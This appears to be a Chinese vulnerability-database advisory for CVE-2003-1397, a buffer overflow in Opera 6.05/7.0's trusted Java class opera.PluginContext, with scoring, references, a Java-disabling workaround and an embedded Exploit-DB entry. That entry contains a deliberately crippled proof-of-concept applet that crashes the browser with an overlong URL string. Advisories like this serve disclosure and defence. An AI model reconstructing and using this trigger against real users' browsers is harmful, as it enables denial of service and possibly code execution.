CVE-2003-1397
CVSS4.3
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:49
NMCOE    

[原文]The PluginContext object of Opera 6.05 and 7.0 allows remote attackers to cause a denial of service (crash) via an HTTP request containing a long string that gets passed to the ShowDocument method.


[CNNVD]Opera opera.PluginContext Native方法远程缓冲区溢出漏洞(CNNVD-200312-360)

        
        Opera是一款开放源代码的WEB浏览器。
        Opera包含的可信Java类('opera.PluginContext')存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户点击,使Opera产生缓冲区溢出,可能以Opera权限在系统上执行任意指令。
        Opera在opera.jar库中拥有自己的类文件,这些文件被系统策略认为是可信资源。但是Java类('opera.PluginContext')中包含的Native方法缺少正确的用户输入检查。利用PluginContext对象的showDocument方法调用包含超长字符串的URL对象,执行这个方法时,由于调用的'native'方法不能正确处理此值,而触发Java虚拟机崩溃,精心构建提交字符串可能以Opera进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:opera_software:opera_web_browser:6.0.5::win32
cpe:/a:opera_software:opera_web_browser:7.0.1::win32
cpe:/a:opera_software:opera_web_browser:7.0_beta2::win32
cpe:/a:opera_software:opera_web_browser:7.0_beta1::win32
cpe:/a:opera_software:opera_web_browser:7.0::win32

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1397
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1397
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-360
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/11280
(UNKNOWN)  XF  opera-plugincontextshowdocument-bo(11280)
http://www.securityfocus.com/bid/6814
(UNKNOWN)  BID  6814
http://www.securityfocus.com/archive/1/311214
(UNKNOWN)  BUGTRAQ  20030210 Java-Applet crashes Opera 6.05 and 7.01
http://securityreason.com/securityalert/3255
(UNKNOWN)  SREASON  3255

- 漏洞信息

Opera opera.PluginContext Native方法远程缓冲区溢出漏洞
中危 其他
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        
        Opera是一款开放源代码的WEB浏览器。
        Opera包含的可信Java类('opera.PluginContext')存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户点击,使Opera产生缓冲区溢出,可能以Opera权限在系统上执行任意指令。
        Opera在opera.jar库中拥有自己的类文件,这些文件被系统策略认为是可信资源。但是Java类('opera.PluginContext')中包含的Native方法缺少正确的用户输入检查。利用PluginContext对象的showDocument方法调用包含超长字符串的URL对象,执行这个方法时,由于调用的'native'方法不能正确处理此值,而触发Java虚拟机崩溃,精心构建提交字符串可能以Opera进程权限在系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在配置文件中关闭Java可执行可防止此漏洞触发。
        厂商补丁:
        Opera Software
        --------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.opera.com

- 漏洞信息 (22240)

Opera 6.0/7.0 opera.PluginContext Native Method Denial Of Service Vulnerability (EDBID:22240)
windows dos
2003-01-13 Verified
0 Marc Schoenefeld
N/A [点击下载]
source: http://www.securityfocus.com/bid/6814/info

Opera ships with a trusted Java class ('opera.PluginContext') that includes a native method that is reportedly prone to denial of service attacks. It is possible for a malicious Java applet to trigger this condition to cause a denial of service. This issue was reported in versions of Opera for Microsoft Windows operating systems. It is not known if other platforms are also affected. Java support must enabled for this issue to be present and can be disabled to prevent attacks. 

//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are couple of obvious syntax errors
to avoid script-kidding

...
import opera.PluginContext; // !! import the vulnerable class
...

public class OperaCall2 extends App1et
{
- -
- - public OperaCall2()
- - {
- - }
- -
- - public void paint(Graphics g)
- - {
- - PluginContext plugincontext = new PluginContext(l);
- - try
- - {
- - plugincontext.showDocument(new URL("http://xxx.xxx" + new
String(new byte[30000])));
- - }
- - catch(Exception exception)
- - {
- - exception.printStackTrace();
- - }
- - }
} 		

- 漏洞信息

60369
Opera PluginContext Object ShowDocument Method HTTP Request Handling Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown

- 漏洞描述

- 时间线

2003-02-10 2003-02-03
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站